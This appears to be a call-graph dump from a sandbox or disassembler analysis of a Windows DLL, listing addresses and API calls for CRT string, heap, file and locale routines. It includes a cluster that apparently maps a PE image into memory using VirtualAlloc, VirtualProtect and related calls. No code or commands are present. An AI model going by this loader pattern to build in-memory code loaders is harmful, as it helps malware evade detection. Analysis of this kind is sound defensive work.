18206->18268 18210 10023404 GetStringTypeW 18209->18210 18213 1002342f 18209->18213 18211 10023424 GetLastError 18210->18211 18212 1002341c 18210->18212 18211->18213 18214 10023468 MultiByteToWideChar 18212->18214 18232 10023510 18212->18232 18213->18212 18215 10023516 18213->18215 18221 10023495 18214->18221 18214->18232 18237 10023880 GetLocaleInfoA 18215->18237 18217 100167d5 _$I10_OUTPUT 5 API calls 18219 1001d5cd 18217->18219 18219->18204 18220 10023567 GetStringTypeA 18224 10023582 18220->18224 18220->18232 18225 100234aa _memset __alloca_probe_16 18221->18225 18226 1001703b _malloc 66 API calls 18221->18226 18223 100234e3 MultiByteToWideChar 18228 1002350a 18223->18228 18229 100234f9 GetStringTypeW 18223->18229 18230 10016380 __mtinitlocknum 66 API calls 18224->18230 18225->18223 18225->18232 18226->18225 18233 1001de43 18228->18233 18229->18228 18230->18232 18232->18217 18234 1001de4b 18233->18234 18235 1001de5c 18233->18235 18234->18235 18236 10016380 __mtinitlocknum 66 API calls 18234->18236 18235->18232 18236->18235 18238 100238b1 18237->18238 18239 100238ac 18237->18239 18240 10017705 ___ansicp 89 API calls 18238->18240 18241 100167d5 _$I10_OUTPUT 5 API calls 18239->18241 18240->18239 18242 1002353a 18241->18242 18242->18220 18242->18232 18243 100238c7 18242->18243 18244 10023905 GetCPInfo 18243->18244 18249 1002398f 18243->18249 18245 1002397a MultiByteToWideChar 18244->18245 18246 1002391c 18244->18246 18245->18249 18252 10023935 _strlen 18245->18252 18246->18245 18247 10023922 GetCPInfo 18246->18247 18247->18245 18250 1002392f 18247->18250 18248 100167d5 _$I10_OUTPUT 5 API calls 18251 1002355b 18248->18251 18249->18248 18250->18245 18250->18252 18251->18220 18251->18232 18253 1001703b _malloc 66 API calls 18252->18253 18255 10023967 _memset __alloca_probe_16 18252->18255 18253->18255 18254 100239c4 MultiByteToWideChar 18256 100239fb 18254->18256 18257 100239dc 18254->18257 18255->18249 18255->18254 18258 1001de43 __freea 66 API calls 18256->18258 18259 100239e3 WideCharToMultiByte 18257->18259 18260 10023a00 18257->18260 18258->18249 18259->18256 18261 10023a0b WideCharToMultiByte 18260->18261 18262 10023a1f 18260->18262 18261->18256 18261->18262 18263 1001e76e __calloc_crt 66 API calls 18262->18263 18264 10023a27 18263->18264 18264->18256 18265 10023a30 WideCharToMultiByte 18264->18265 18265->18256 18266 10023a42 18265->18266 18267 10016380 __mtinitlocknum 66 API calls 18266->18267 18267->18256 18269 1001de98 18268->18269 18270 1001de7d LCMapStringW 18268->18270 18272 1001def2 18269->18272 18273 1001e095 18269->18273 18270->18269 18271 1001dea0 GetLastError 18270->18271 18271->18269 18274 1001df0b MultiByteToWideChar 18272->18274 18297 1001e08c 18272->18297 18275 10023880 ___ansicp 90 API calls 18273->18275 18282 1001df38 18274->18282 18274->18297 18277 1001e0bd 18275->18277 18276 100167d5 _$I10_OUTPUT 5 API calls 18278 1001d5ed 18276->18278 18279 1001e1b1 LCMapStringA 18277->18279 18280 1001e0d6 18277->18280 18277->18297 18278->18198 18283 1001e10d 18279->18283 18284 100238c7 ___convertcp 73 API calls 18280->18284 18281 1001df89 MultiByteToWideChar 18285 1001dfa2 LCMapStringW 18281->18285 18286 1001e083 18281->18286 18288 1001703b _malloc 66 API calls 18282->18288 18295 1001df51 __alloca_probe_16 18282->18295 18287 1001e1d8 18283->18287 18292 10016380 __mtinitlocknum 66 API calls 18283->18292 18289 1001e0e8 18284->18289 18285->18286 18291 1001dfc3 18285->18291 18290 1001de43 __freea 66 API calls 18286->18290 18296 10016380 __mtinitlocknum 66 API calls 18287->18296 18287->18297 18288->18295 18293 1001e0f2 LCMapStringA 18289->18293 18289->18297 18290->18297 18294 1001dfcb 18291->18294 18301 1001dff4 18291->18301 18292->18287 18293->18283 18299 1001e114 18293->18299 18294->18286 18298 1001dfdd LCMapStringW 18294->18298 18295->18281 18295->18297 18296->18297 18297->18276 18298->18286 18302 1001e125 _memset __alloca_probe_16 18299->18302 18304 1001703b _malloc 66 API calls 18299->18304 18300 1001e043 LCMapStringW 18305 1001e05b WideCharToMultiByte 18300->18305 18306 1001e07d 18300->18306 18303 1001703b _malloc 66 API calls 18301->18303 18307 1001e00f __alloca_probe_16 18301->18307 18302->18283 18308 1001e163 LCMapStringA 18302->18308 18303->18307 18304->18302 18305->18306 18309 1001de43 __freea 66 API calls 18306->18309 18307->18286 18307->18300 18310 1001e183 18308->18310 18311 1001e17f 18308->18311 18309->18286 18313 100238c7 ___convertcp 73 API calls 18310->18313 18314 1001de43 __freea 66 API calls 18311->18314 18313->18311 18314->18283 18315->18093 18319 10019eac 18316->18319 18320 10016e2b _LocaleUpdate::_LocaleUpdate 76 API calls 18319->18320 18321 10019ebd 18320->18321 18321->18018 18324 1001fc6a 18322->18324 18323 1001bd03 __encode_pointer 4 API calls 18323->18324 18324->18323 18325 1001fc82 18324->18325 18325->17623 18329 100176b7 18326->18329 18328 100176fc 18328->17625 18330 100176c3 __lseeki64 18329->18330 18337 10017e05 18330->18337 18336 100176e4 __lseeki64 18336->18328 18338 1001a549 __lock 66 API calls 18337->18338 18339 100176c8 18338->18339 18340 100175db 18339->18340 18341 1001bd6f __decode_pointer 4 API calls 18340->18341 18342 100175eb 18341->18342 18343 1001bd6f __decode_pointer 4 API calls 18342->18343 18344 100175fc 18343->18344 18348 10017676 18344->18348 18358 1001a023 18344->18358 18346 10017616 18349 10017638 18346->18349 18354 10017661 18346->18354 18371 1001e7b6 18346->18371 18347 1001bd03 __encode_pointer 4 API calls 18347->18348 18355 100176ed 18348->18355 18349->18348 18351 1001e7b6 __realloc_crt 73 API calls 18349->18351 18352 1001764f 18349->18352 18351->18352 18352->18348 18353 1001bd03 __encode_pointer 4 API calls 18352->18353 18353->18354 18354->18347 18421 10017e0e 18355->18421 18359 1001a02f __lseeki64 18358->18359 18360 1001a05c 18359->18360 18361 1001a03f 18359->18361 18362 1001a09d HeapSize 18360->18362 18364 1001a549 __lock 66 API calls 18360->18364 18363 10017d62 __lseeki64 66 API calls 18361->18363 18367 1001a054 __lseeki64 18362->18367 18365 1001a044 18363->18365 18368 1001a06c ___sbh_find_block 18364->18368 18366 1001c596 __lseeki64 4 API calls 18365->18366 18366->18367 18367->18346 18376 1001a0bd 18368->18376 18374 1001e7ba 18371->18374 18373 1001e7fc 18373->18349 18374->18373 18375 1001e7dd Sleep 18374->18375 18380 1001721c 18374->18380 18375->18374 18379 1001a471 LeaveCriticalSection 18376->18379 18378 1001a098 18378->18362 18378->18367 18379->18378 18381 10017228 __lseeki64 18380->18381 18382 1001723d 18381->18382 18383 1001722f 18381->18383 18385 10017250 18382->18385 18386 10017244 18382->18386 18384 1001703b _malloc 66 API calls 18383->18384 18402 10017237 _realloc __lseeki64 18384->18402 18392 100173c2 18385->18392 18415 1001725d ___sbh_resize_block ___sbh_find_block 18385->18415 18387 10016380 __mtinitlocknum 66 API calls 18386->18387 18387->18402 18388 100173f5 18390 1001e520 __calloc_impl 4 API calls 18388->18390 18389 100173c7 HeapReAlloc 18389->18392 18389->18402 18393 100173fb 18390->18393 18391 1001a549 __lock 66 API calls 18391->18415 18392->18388 18392->18389 18394 10017419 18392->18394 18396 1001e520 __calloc_impl 4 API calls 18392->18396 18398 1001740f 18392->18398 18395 10017d62 __lseeki64 66 API calls 18393->18395 18397 10017d62 __lseeki64 66 API calls 18394->18397 18394->18402 18395->18402 18396->18392 18399 10017422 GetLastError 18397->18399 18401 10017d62 __lseeki64 66 API calls 18398->18401 18399->18402 18404 10017390 18401->18404 18402->18374 18403 100172e8 HeapAlloc 18403->18415 18404->18402 18405 10017395 GetLastError 18404->18405 18405->18402 18406 1001733d HeapReAlloc 18406->18415 18407 1001ad96 ___sbh_alloc_block 5 API calls 18407->18415 18408 100173a8 18408->18402 18410 10017d62 __lseeki64 66 API calls 18408->18410 18409 1001e520 __calloc_impl 4 API calls 18409->18415 18413 100173b5 18410->18413 18411 1001738b 18414 10017d62 __lseeki64 66 API calls 18411->18414 18412 10016a10 __VEC_memcpy _memcpy_s 18412->18415 18413->18399 18413->18402 18414->18404 18415->18388 18415->18391 18415->18402 18415->18403 18415->18406 18415->18407 18415->18408 18415->18409 18415->18411 18415->18412 18416 1001a5ed VirtualFree VirtualFree HeapFree ___sbh_free_block 18415->18416 18417 10017360 18415->18417 18416->18415 18420 1001a471 LeaveCriticalSection 18417->18420 18419 10017367 18419->18415 18420->18419 18424 1001a471 LeaveCriticalSection 18421->18424 18423 100176f2 18423->18336 18424->18423 18426 10017f60 __lseeki64 18425->18426 18427 1001a549 __lock 66 API calls 18426->18427 18428 10017f67 18427->18428 18430 1001bd6f __decode_pointer 4 API calls 18428->18430 18438 10017fa3 _doexit 18428->18438 18432 10017f96 18430->18432 18434 1001bd6f __decode_pointer 4 API calls 18432->18434 18433 1001800a __lseeki64 18433->17633 18434->18438 18436 10018001 18437 10017df0 __mtinitlocknum 3 API calls 18436->18437 18437->18433 18439 1001800d 18438->18439 18440 10018013 18439->18440 18441 10017fee 18439->18441 18444 1001a471 LeaveCriticalSection 18440->18444 18441->18433 18443 1001a471 LeaveCriticalSection 18441->18443 18443->18436 18444->18441 18446 1001710a __lseeki64 18445->18446 18447 10017122 18446->18447 18457 10017141 _memset 18446->18457 18448 10017d62 __lseeki64 65 API calls 18447->18448 18449 10017127 18448->18449 18450 1001c596 __lseeki64 4 API calls 18449->18450 18452 10017137 __lseeki64 18450->18452 18451 100171b3 RtlAllocateHeap 18451->18457 18452->17642 18453 1001e520 __calloc_impl 4 API calls 18453->18457 18454 1001a549 __lock 65 API calls 18454->18457 18455 1001ad96 ___sbh_alloc_block 5 API calls 18455->18457 18457->18451 18457->18452 18457->18453 18457->18454 18457->18455 18458 100171fa 18457->18458 18461 1001a471 LeaveCriticalSection 18458->18461 18460 10017201 18460->18457 18461->18460 18462->17654 18466 1001a471 LeaveCriticalSection 18463->18466 18465 1001bef4 18465->17662 18466->18465 18468 1001a8cc __cftoe2_l 18467->18468 18469 1001a62a 18467->18469 18468->17672 18469->18468 18470 1001a816 VirtualFree 18469->18470 18471 1001a87a 18470->18471 18471->18468 18472 1001a889 VirtualFree HeapFree 18471->18472 18472->18468 18476 1001a471 LeaveCriticalSection 18473->18476 18475 100163dd 18475->17675 18476->18475 18479 1001bf9d __lseeki64 18477->18479 18478 1001c091 __lseeki64 18478->17686 18479->18478 18480 1001bfb5 18479->18480 18481 10016380 __mtinitlocknum 66 API calls 18479->18481 18482 1001bfc3 18480->18482 18483 10016380 __mtinitlocknum 66 API calls 18480->18483 18481->18480 18484 1001bfd1 18482->18484 18486 10016380 __mtinitlocknum 66 API calls 18482->18486 18483->18482 18485 1001bfdf 18484->18485 18487 10016380 __mtinitlocknum 66 API calls 18484->18487 18488 1001bfed 18485->18488 18489 10016380 __mtinitlocknum 66 API calls 18485->18489 18486->18484 18487->18485 18490 1001bffb 18488->18490 18491 10016380 __mtinitlocknum 66 API calls 18488->18491 18489->18488 18492 1001c00c 18490->18492 18494 10016380 __mtinitlocknum 66 API calls 18490->18494 18491->18490 18493 1001a549 __lock 66 API calls 18492->18493 18495 1001c014 18493->18495 18494->18492 18496 1001c020 InterlockedDecrement 18495->18496 18497 1001c039 18495->18497 18496->18497 18498 1001c02b 18496->18498 18511 1001c09d 18497->18511 18498->18497 18501 10016380 __mtinitlocknum 66 API calls 18498->18501 18501->18497 18502 1001a549 __lock 66 API calls 18503 1001c04d 18502->18503 18504 1001c07e 18503->18504 18506 1001dd03 ___removelocaleref 8 API calls 18503->18506 18514 1001c0a9 18504->18514 18509 1001c062 18506->18509 18508 10016380 __mtinitlocknum 66 API calls 18508->18478 18509->18504 18510 1001db3d ___freetlocinfo 66 API calls 18509->18510 18510->18504 18517 1001a471 LeaveCriticalSection 18511->18517 18513 1001c046 18513->18502 18518 1001a471 LeaveCriticalSection 18514->18518 18516 1001c08b 18516->18508 18517->18513 18518->18516 18520 1001703b _malloc 66 API calls 18519->18520 18521 10008870 18520->18521 18522 10016380 __mtinitlocknum 66 API calls 18521->18522 18523 1000887c 18521->18523 18522->18523 18523->17479 18523->17482 18525 1001703b _malloc 66 API calls 18524->18525 18526 10002fc0 18525->18526 18526->17493 18547 10002900 18527->18547 18531 10017727 __lseeki64 18530->18531 18532 10017735 18531->18532 18535 10017752 __stbuf 18531->18535 18533 10017d62 __lseeki64 66 API calls 18532->18533 18534 1001773a 18533->18534 18536 1001c596 __lseeki64 4 API calls 18534->18536 18643 1001ebab 18535->18643 18539 1001774a __lseeki64 18536->18539 18538 10017764 __stbuf 18648 1001ec20 18538->18648 18539->17481 18541 10017776 __stbuf 18655 1001cb16 18541->18655 18543 1001778e __stbuf 18699 1001ecb6 18543->18699 18582 10001fe0 18547->18582 18550 10002943 SetLastError 18580 10002929 ShowWindow 18550->18580 18551 10002955 18552 10001fe0 ___DllMainCRTStartup SetLastError 18551->18552 18553 1000296e 18552->18553 18554 10002990 SetLastError 18553->18554 18555 100029a2 18553->18555 18553->18580 18554->18580 18556 100029b1 SetLastError 18555->18556 18557 100029c3 18555->18557 18556->18580 18558 100029ce SetLastError 18557->18558 18560 100029e0 GetNativeSystemInfo 18557->18560 18558->18580 18561 10002a94 SetLastError 18560->18561 18562 10002aa6 VirtualAlloc 18560->18562 18561->18580 18563 10002af2 GetProcessHeap HeapAlloc 18562->18563 18564 10002ac7 VirtualAlloc 18562->18564 18566 10002b2c 18563->18566 18567 10002b0c VirtualFree SetLastError 18563->18567 18564->18563 18565 10002ae3 SetLastError 18564->18565 18565->18580 18568 10001fe0 ___DllMainCRTStartup SetLastError 18566->18568 18567->18580 18569 10002b8e 18568->18569 18570 10002b92 18569->18570 18571 10002b9c VirtualAlloc 18569->18571 18614 10002ec0 18570->18614 18572 10002bcb ___DllMainCRTStartup 18571->18572 18585 10002010 18572->18585 18575 10002bff ___DllMainCRTStartup 18575->18570 18595 10002670 18575->18595 18579 10002c68 ___DllMainCRTStartup 18579->18570 18579->18580 18581 10002ccf SetLastError 18579->18581 18580->17481 18581->18570 18583 10001ffb 18582->18583 18584 10001fef SetLastError 18582->18584 18583->18550 18583->18551 18583->18580 18584->18583 18586 10002040 18585->18586 18587 100020d3 18586->18587 18589 1000207c VirtualAlloc 18586->18589 18594 100020f0 ___DllMainCRTStartup 18586->18594 18588 10001fe0 ___DllMainCRTStartup SetLastError 18587->18588 18590 100020ec 18588->18590 18591 100020a0 18589->18591 18592 100020a7 ___DllMainCRTStartup 18589->18592 18593 100020f4 VirtualAlloc 18590->18593 18590->18594 18591->18594 18592->18586 18593->18594 18594->18575 18596 100026a9 IsBadReadPtr 18595->18596 18605 1000269f 18595->18605 18598 100026d3 18596->18598 18596->18605 18599 10002705 SetLastError 18598->18599 18600 10002719 18598->18600 18598->18605 18599->18605 18621 10001f00 18600->18621 18603 1000273f SetLastError 18603->18605 18605->18570 18608 10002300 18605->18608 18606 10002769 18606->18605 18607 10002879 SetLastError 18606->18607 18607->18605 18612 10002348 ___DllMainCRTStartup 18608->18612 18609 10002451 18610 100021d0 ___DllMainCRTStartup 2 API calls 18609->18610 18613 1000242d 18610->18613 18612->18609 18612->18613 18636 100021d0 18612->18636 18613->18579 18615 10002ed5 18614->18615 18620 10002eda 18614->18620 18615->18580 18616 10002f64 18617 10002f70 VirtualFree 18616->18617 18618 10002f84 GetProcessHeap HeapFree 18616->18618 18617->18618 18618->18615 18619 10001eb0 ___DllMainCRTStartup VirtualFree 18619->18616 18620->18616 18620->18619 18622 10001f15 18621->18622 18623 10001f0c 18621->18623 18626 10001f23 18622->18626 18632 10001ed0 VirtualAlloc 18622->18632 18629 10001de0 18623->18629 18626->18603 18626->18606 18627 10001f31 ___DllMainCRTStartup 18627->18626 18633 10001eb0 18627->18633 18630 10001df0 VirtualQuery 18629->18630 18631 10001dec 18629->18631 18630->18631 18631->18622 18632->18627 18634 10001eb9 VirtualFree 18633->18634 18635 10001eca 18633->18635 18634->18635 18635->18626 18637 100021ec 18636->18637 18638 100021e2 18636->18638 18640 10002254 VirtualProtect 18637->18640 18641 100021fa 18637->18641 18638->18612 18640->18638 18641->18638 18642 10002232 VirtualFree 18641->18642 18642->18638 18644 1001ebb4 18643->18644 18645 1001ebbf EnterCriticalSection 18643->18645 18646 1001a549 __lock 66 API calls 18644->18646 18645->18538 18647 1001ebbd 18646->18647 18647->18538 18707 100231a0 18648->18707 18650 1001ec2b 18714 10023142 18650->18714 18652 1001ec31 __stbuf 18653 1001ec7d 18652->18653 18654 1001e72e __malloc_crt 66 API calls 18652->18654 18653->18541 18654->18653 18656 10016e2b _LocaleUpdate::_LocaleUpdate 76 API calls 18655->18656 18657 1001cb71 18656->18657 18658 1001cb76 18657->18658 18660 100231a0 __output_l 66 API calls 18657->18660 18687 1001cc37 18657->18687 18659 10017d62 __lseeki64 66 API calls 18658->18659 18688 1001cb7b 18659->18688 18661 1001cbb6 18660->18661 18663 1001cbe4 18661->18663 18665 100231a0 __output_l 66 API calls 18661->18665 18662 1001c596 __lseeki64 4 API calls 18664 1001cb8b 18662->18664 18663->18658 18668 100231a0 __output_l 66 API calls 18663->18668 18666 100167d5 _$I10_OUTPUT 5 API calls 18664->18666 18667 1001cbc4 18665->18667 18669 1001d483 18666->18669 18667->18663 18671 100231a0 __output_l 66 API calls 18667->18671 18670 1001cc09 18668->18670 18669->18543 18676 100231a0 __output_l 66 API calls 18670->18676 18670->18687 18672 1001cbd2 18671->18672 18674 100231a0 __output_l 66 API calls 18672->18674 18674->18663 18675 1001cc5c __output_l __aulldvrm _strlen 18675->18664 18678 10020d3c 100 API calls __output_l 18675->18678 18680 1001cecc 18675->18680 18681 1001d44c 18675->18681 18683 10016380 __mtinitlocknum 66 API calls 18675->18683 18686 10020d6f 100 API calls _write_multi_char 18675->18686 18690 1002332c 78 API calls _wctomb_s 18675->18690 18698 1001cacc 100 API calls _write_string 18675->18698 18724 1001e243 18675->18724 18677 1001cc17 18676->18677 18679 100231a0 __output_l 66 API calls 18677->18679 18677->18687 18678->18675 18682 1001cc25 18679->18682 18691 1001e72e __malloc_crt 66 API calls 18680->18691 18692 1001cef4 18680->18692 18685 10017d62 __lseeki64 66 API calls 18681->18685 18684 100231a0 __output_l 66 API calls 18682->18684 18683->18675 18684->18687 18685->18688 18686->18675 18687->18658 18687->18675 18688->18662 18689 1001bd6f __decode_pointer 4 API calls 18694 1001d13b 18689->18694 18690->18675 18691->18692 18692->18689 18693 1001d161 18695 1001d180 18693->18695 18697 1001bd6f __decode_pointer 4 API calls 18693->18697 18694->18693 18696 1001bd6f __decode_pointer 4 API calls 18694->18696 18695->18543 18696->18693 18697->18695 18698->18675 18700 1001ecbd 18699->18700 18702 1001779f 18699->18702 18700->18702 18727 10023cfc 18700->18727 18703 100177b7 18702->18703 18704 100177bc __stbuf 18703->18704 18868 1001ebfd 18704->18868 18706 100177c7 18706->18539 18708 100231ab 18707->18708 18709 100231c8 18707->18709 18710 10017d62 __lseeki64 66 API calls 18708->18710 18709->18650 18711 100231b0 18710->18711 18712 1001c596 __lseeki64 4 API calls 18711->18712 18713 100231c0 18712->18713 18713->18650 18715 1002314b 18714->18715 18716 10023159 18714->18716 18717 10017d62 __lseeki64 66 API calls 18715->18717 18719 10023184 18716->18719 18720 10017d62 __lseeki64 66 API calls 18716->18720 18718 10023150 18717->18718 18718->18652 18719->18652 18721 1002316d 18720->18721 18722 1001c596 __lseeki64 4 API calls 18721->18722 18723 1002317d 18722->18723 18723->18652 18725 10016e2b _LocaleUpdate::_LocaleUpdate 76 API calls 18724->18725 18726 1001e254 18725->18726 18726->18675 18728 10023d11 18727->18728 18732 10023d32 18727->18732 18729 100231a0 __output_l 66 API calls 18728->18729 18728->18732 18730 10023d2b 18729->18730 18733 10023022 18730->18733 18732->18702 18734 1002302e __lseeki64 18733->18734 18735 10023036 18734->18735 18739 10023051 18734->18739 18758 10017d75 18735->18758 18737 1002305f 18740 10017d75 __lseeki64 66 API calls 18737->18740 18739->18737 18741 100230a0 18739->18741 18743 10023064 18740->18743 18761 10024a5b 18741->18761 18742 10017d62 __lseeki64 66 API calls 18751 10023043 __lseeki64 18742->18751 18745 10017d62 __lseeki64 66 API calls 18743->18745 18747 1002306b 18745->18747 18746 100230a6 18749 100230b3 18746->18749 18750 100230c9 18746->18750 18748 1001c596 __lseeki64 4 API calls 18747->18748 18748->18751 18771 10022a5c 18749->18771 18753 10017d62 __lseeki64 66 API calls 18750->18753 18751->18732 18755 100230ce 18753->18755 18754 100230c1 18828 100230f4 18754->18828 18756 10017d75 __lseeki64 66 API calls 18755->18756 18756->18754 18759 1001bef6 __getptd_noexit 66 API calls 18758->18759 18760 10017d7a 18759->18760 18760->18742 18763 10024a67 __lseeki64 18761->18763 18762 10024ac2 18765 10024ac7 EnterCriticalSection 18762->18765 18766 10024ae4 __lseeki64 18762->18766 18763->18762 18764 1001a549 __lock 66 API calls 18763->18764 18767 10024a93 18764->18767 18765->18766 18766->18746 18768 10024aaa 18767->18768 18769 1001febd ___crtInitCritSecAndSpinCount 66 API calls 18767->18769 18831 10024af2 18768->18831 18769->18768 18772 10022a98 18771->18772 18802 10022a91 18771->18802 18773 10022ac3 18772->18773 18774 10022a9c 18772->18774 18778 10022b2d 18773->18778 18779 10022b07 18773->18779 18776 10017d75 __lseeki64 66 API calls 18774->18776 18775 100167d5 _$I10_OUTPUT 5 API calls 18777 1002301a 18775->18777 18780 10022aa1 18776->18780 18777->18754 18783 10022b3f 18778->18783 18835 100228c0 18778->18835 18782 10017d75 __lseeki64 66 API calls 18779->18782 18781 10017d62 __lseeki64 66 API calls 18780->18781 18785 10022aa8 18781->18785 18787 10022b0c 18782->18787 18786 10023142 __stbuf 66 API calls 18783->18786 18788 1001c596 __lseeki64 4 API calls 18785->18788 18789 10022b48 18786->18789 18790 10017d62 __lseeki64 66 API calls 18787->18790 18788->18802 18791 10022d47 18789->18791 18798 1001bf79 FindHandlerForForeignException 66 API calls 18789->18798 18792 10022b15 18790->18792 18793 10022d55 18791->18793 18794 10022f7a WriteFile 18791->18794 18795 1001c596 __lseeki64 4 API calls 18792->18795 18796 10022df8 18793->18796 18804 10022d67 18793->18804 18797 10022fa1 GetLastError 18794->18797 18807 10022d42 18794->18807 18795->18802 18808 10022e02 18796->18808 18817 10022e9f 18796->18817 18797->18807 18800 10022b63 GetConsoleMode 18798->18800 18799 10022fdb 18799->18802 18805 10017d62 __lseeki64 66 API calls 18799->18805 18800->18791 18801 10022b87 18800->18801 18801->18791 18806 10022b95 GetConsoleCP 18801->18806 18802->18775 18803 10022db2 WriteFile 18803->18797 18803->18804 18804->18799 18804->18803 18804->18807 18810 10022fc8 18805->18810 18806->18807 18825 10022bb5 18806->18825 18807->18799 18807->18802 18812 10022fbb 18807->18812 18808->18799 18808->18807 18809 10022e55 WriteFile 18808->18809 18809->18797 18809->18808 18819 10017d75 __lseeki64 66 API calls 18810->18819 18811 10022ef5 WideCharToMultiByte 18811->18797 18815 10022f28 WriteFile 18811->18815 18813 10022fc3 18812->18813 18814 10022fd0 18812->18814 18820 10017d62 __lseeki64 66 API calls 18813->18820 18848 10017d88 18814->18848 18816 10022f56 GetLastError 18815->18816 18815->18817 18816->18817 18817->18799 18817->18807 18817->18811 18817->18815 18819->18802 18820->18810 18822 10024b1d 11 API calls __putwch_nolock 18822->18825 18823 10023f96 78 API calls __write_nolock 18823->18825 18824 10022c2d WideCharToMultiByte 18824->18807 18826 10022c5b WriteFile 18824->18826 18825->18797 18825->18807 18825->18822 18825->18823 18825->18824 18827 10022c94 WriteFile 18825->18827 18845 1001e279 18825->18845 18826->18797 18826->18825 18827->18797 18827->18825 18867 10024afb LeaveCriticalSection 18828->18867 18830 100230fc 18830->18751 18834 1001a471 LeaveCriticalSection 18831->18834 18833 10024af9 18833->18762 18834->18833 18853 100249ea 18835->18853 18837 100228dc 18838 100228e4 18837->18838 18839 100228f5 SetFilePointer 18837->18839 18840 10017d62 __lseeki64 66 API calls 18838->18840 18841 100228e9 18839->18841 18842 1002290d GetLastError 18839->18842 18840->18841 18841->18783 18842->18841 18843 10022917 18842->18843 18844 10017d88 __dosmaperr 66 API calls 18843->18844 18844->18841 18846 1001e243 __isleadbyte_l 76 API calls 18845->18846 18847 1001e284 18846->18847 18847->18825 18849 10017d75 __lseeki64 66 API calls 18848->18849 18850 10017d8e _realloc 18849->18850 18851 10017d62 __lseeki64 66 API calls 18850->18851 18852 10017da2 18851->18852 18852->18802 18854 100249f3 18853->18854 18855 10024a0a 18853->18855 18856 10017d75 __lseeki64 66 API calls 18854->18856 18858 10017d75 __lseeki64 66 API calls 18855->18858 18860 10024a57 18855->18860 18857 100249f8 18856->18857 18859 10017d62 __lseeki64 66 API calls 18857->18859 18861 10024a38 18858->18861 18862 10024a00 18859->18862 18860->18837 18863 10017d62 __lseeki64 66 API calls 18861->18863 18862->18837 18864 10024a3f 18863->18864 18865 1001c596 __lseeki64 4 API calls 18864->18865 18866 10024a4f 18865->18866 18866->18837 18867->18830 18869 1001ec11 LeaveCriticalSection 18868->18869 18870 1001ec06 18868->18870 18869->18706 18873 1001a471 LeaveCriticalSection 18870->18873 18872 1001ec0f 18872->18706 18873->18872 18874 10013d98 18877 10013da4 __EH_prolog3 18874->18877 18876 10013df2 18909 1001398e EnterCriticalSection 18876->18909 18877->18876 18885 10013a9b EnterCriticalSection 18877->18885 18899 1000a0db 18877->18899 18906 10013bab TlsAlloc 18877->18906 18882 10013e05 18916 10013c4d 18882->18916 18883 10013e18 ~_Task_impl 18890 10013aba 18885->18890 18886 10013b76 _memset 18887 10013b8a LeaveCriticalSection 18886->18887 18887->18877 18888 10013af3 18940 100134f9 18888->18940 18889 10013b08 GlobalHandle GlobalUnlock 18892 100134f9 codecvt 80 API calls 18889->18892 18890->18886 18890->18888 18890->18889 18894 10013b25 GlobalReAlloc 18892->18894 18895 10013b2f 18894->18895 18896 10013b57 GlobalLock 18895->18896 18897 10013b48 LeaveCriticalSection 18895->18897 18898 10013b3a GlobalHandle GlobalLock 18895->18898 18896->18886 18897->18896 18898->18897 18900 10017c83 __CxxThrowException@8 RaiseException 18899->18900 18901 1000a0f4 __EH_prolog3 18900->18901 18902 10013965 ~_Task_impl 2 API calls 18901->18902 18903 1000a106 18902->18903 18904 10013965 ~_Task_impl 2 API calls 18903->18904 18905 1000a10b codecvt ~_Task_impl 18904->18905 18905->18877 18907 10013bd7 18906->18907 18908 10013bdc InitializeCriticalSection 18906->18908 18907->18908 18908->18877 18910 100139a5 18909->18910 18911 100139cc LeaveCriticalSection 18909->18911 18910->18911 18912 100139aa TlsGetValue 18910->18912 18913 100139d5 18911->18913 18912->18911 18914 100139b6 18912->18914 18913->18882 18913->18883 18914->18911 18915 100139bb LeaveCriticalSection 18914->18915 18915->18913 19030 10017bf4 18916->19030 18918 10013c59 EnterCriticalSection 18919 10013c78 18918->18919 18925 10013d5c LeaveCriticalSection 18918->18925 18921 10013c81 TlsGetValue 18919->18921 18919->18925 18923 10013cbf 18921->18923 18935 10013c8f 18921->18935 18922 10013d7f ~_Task_impl 18922->18883 18924 10013965 ~_Task_impl 2 API calls 18923->18924 18926 10013cc9 18924->18926 18925->18922 19031 10013a82 18926->19031 18927 10013d04 18930 100134f9 codecvt 80 API calls 18927->18930 18928 10013ca9 18929 100134f9 codecvt 80 API calls 18928->18929 18931 10013cb3 LocalAlloc 18929->18931 18933 10013d10 LocalReAlloc 18930->18933 18934 10013d1c 18931->18934 18933->18934 18936 10013d20 LeaveCriticalSection 18934->18936 18937 10013d2e _memset 18934->18937 18935->18925 18935->18927 18935->18928 18938 1000a0a7 ~_Task_impl RaiseException 18936->18938 18939 10013d47 TlsSetValue 18937->18939 18938->18937 18939->18925 18941 1001350c codecvt 18940->18941 18942 10013519 GlobalAlloc 18941->18942 18944 10001040 18941->18944 18942->18895 18945 10001053 18944->18945 18946 1000104c 18944->18946 18953 10009d34 18945->18953 18950 1000a0a7 18946->18950 18964 10017c83 18950->18964 18952 1000a0c0 18954 10009d40 __EH_prolog3 18953->18954 18967 10009b91 18954->18967 18956 10009d47 codecvt 18957 10017c83 __CxxThrowException@8 RaiseException 18956->18957 18958 10009d76 FormatMessageA 18957->18958 18960 10001051 18958->18960 18961 10009dad 18958->18961 18960->18942 18971 10009c0d 18961->18971 18965 10017cb6 RaiseException 18964->18965 18966 10017caa 18964->18966 18965->18952 18966->18965 18969 10009b99 18967->18969 18968 1001703b _malloc 66 API calls 18968->18969 18969->18968 18970 10009bb7 18969->18970 18970->18956 18976 10017ba6 18971->18976 18975 10009c28 LocalFree 18975->18960 18991 1001f9a8 18976->18991 18979 10009bc7 18980 10009bcf 18979->18980 18981 10009bd4 18979->18981 18980->18981 18982 10009be8 18980->18982 18981->18975 18983 10017c83 __CxxThrowException@8 RaiseException 18981->18983 18985 10017c83 __CxxThrowException@8 RaiseException 18982->18985 18984 1000a0f4 __EH_prolog3 18983->18984 19026 10013965 LocalAlloc 18984->19026 18986 1000a0c0 18985->18986 18989 10013965 ~_Task_impl 2 API calls 18990 1000a10b codecvt ~_Task_impl 18989->18990 18990->18975 18992 1001f9ba 18991->18992 18993 1001f9be 18992->18993 18994 1001f9f1 18992->18994 18995 10017d62 __lseeki64 66 API calls 18993->18995 19018 10009c22 18993->19018 18998 1001fa20 18994->18998 18999 1001fa02 18994->18999 18994->19018 18996 1001f9d8 18995->18996 18997 1001c596 __lseeki64 4 API calls 18996->18997 18997->19018 19000 10016e2b _LocaleUpdate::_LocaleUpdate 76 API calls 18998->19000 19001 10017d62 __lseeki64 66 API calls 18999->19001 19002 1001fa2b 19000->19002 19003 1001fa09 19001->19003 19004 1001fa33 19002->19004 19007 1001fa48 19002->19007 19005 1001c596 __lseeki64 4 API calls 